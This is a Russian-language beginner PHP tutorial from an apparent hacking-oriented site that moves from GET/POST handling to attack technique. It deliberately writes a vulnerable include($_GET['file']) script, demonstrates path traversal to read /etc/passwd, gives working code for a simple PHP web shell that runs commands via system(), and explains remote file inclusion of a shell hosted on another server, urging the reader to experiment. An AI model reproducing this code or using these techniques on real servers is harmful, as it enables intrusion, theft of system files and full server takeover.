HELLO WORLD TEAM - %CE%F1%ED%EE%E2%FB+PHP+%232 - Интернет Безопасность Основы PHP #2
Сегодня , я поведаю тебе о других функциях PHP.
Это второй урок .
Для начала я поведаю как принимать данные от пользователя .
Есть несколько методов приёма , основные это GET и POST .
GET метод , принимает данные через урл , POST метод принимает их скрыто от пользовательских глаз.
Итак , сеичас я покажу тебе как можно принять с помощью метода GET ,
от пользователя его имя и вывести его на екран ,
для начала давай напишем HTML форму для приёма данных .
В первой строке мы создали форму и её метод , во второй строке мы присваиваем переменной "name" значение введенное пользователем,
в третей строке мы сделали кнопку , четвёртой завершили форму .
Я конечно надеюсь что , html ты хоть немного но знаеш.
А теперь , напишим скрипт PHP , который примет значение переменной "name" и выведет его на экран.
<?
$name=$_GET['name'];
print $name;
?>
В первой строке , переменная $name принимает значение введенное в форму для имени , во второй строке функция print ,
выводит на экран её значение .
Теперь сделаем тоже самое , но так чтоб значение переменной "name" передавалось скрыто , для этого нам понадобится
изменить GET на POST , для начала сделаем это с html кодом ,вместо <form method="GET"> пишем <form method="POST">,
затем в PHP коде изменяем $name=$_GET['name']; на $name=$_POST['name']; ,
надеюсь различия ты заметил.
Вот мы и познакомились с приёмом данных введеных пользователем.
Обсудим функцию include .
Эта функция подгружает дополнительный файл , указаннай в скобках .
Давай напишем бажный скрипт (для твоих будущих учебных целей) который будет принимать имя файла и выводить его на экран.
Сначала html .
<form method="GET">
Введите имя файла :<input type="text" name="file">
<input type="submit" value="OK">
</form>
Теперь PHP :
<?
$file=$_GET['file'];
include($file);
?>
Как видиш всё очень просто . В первой строке php кода мы принимаем имя файла ,
во второй подгружаем файл с введенным именем и выводим его на экран.
Функция include , исполняет весь код php подгружаемого файла (Если таковой присутствует) и выводит HTML ,
без изменений как таковых(Специально незаданных).
И теперь к самому вкусному .
Если имя файла можно ввести , то можно ввести такое имя как ../../../etc/passwd
и на екране появится содержимое файла пользователей , как ты уже догодался , это нам в пользу ,
можно прочитать любой файл , а можно и подгрузить и свой ,
специально приготовленный для этой цели(загруженный на бесплатом хостинге Shell),
и тогда ты получиш доступ к файловой системе сервера. Вобщем эксперементируй .
Что такое Shell .
Shell это снаряд,или бомба в руках хацкера .
С помощью Shell можно исполнять команды , удалять или создавать файлы и т.д. .
Создаём шелл .
Сначала создаём html форму .
<form method="GET">
Введите команду :<input type="text" name="command">
<input type="submit" value="ENTER">
</form>
Теперь PHP код .
<?
$command=$_GET['command'];
print system("$command");
?>
А теперь посмотрим что мы создали..
В первой строке , как ты наверное догадался , мы принимаем команду ,
во второй выводим на экран результат с помощью новой функции system(); .
Функция system(); принимает в скобках команду , а функция print выводит результат на экран .
Вот мы и создали Shell . Конечно это не очень функциональный шел , но для тебя как новичка ,
на первое время подойдёт.
Теперь главное о функции include .
C помощью этой функции можно загрузить и удалённый файл(от слова дальний), тоесть файл
который находится на другом сервере . Для этого , нужно функции include передать ссылку на файл,
вот так : include("http://adress/papka/shell.php"); ,
учитывая то что файл загружен на хостинг не имеющий поддержки PHP .
Теперь тебе задание : поупражняйся с загрузкой локального файла и удалённого ..
На сегодня всё .
Всем спасибо за внимание .
Статья ращитанна для новичков .
Если что-то непонятно , обращайся в ICQ#: 6566442 .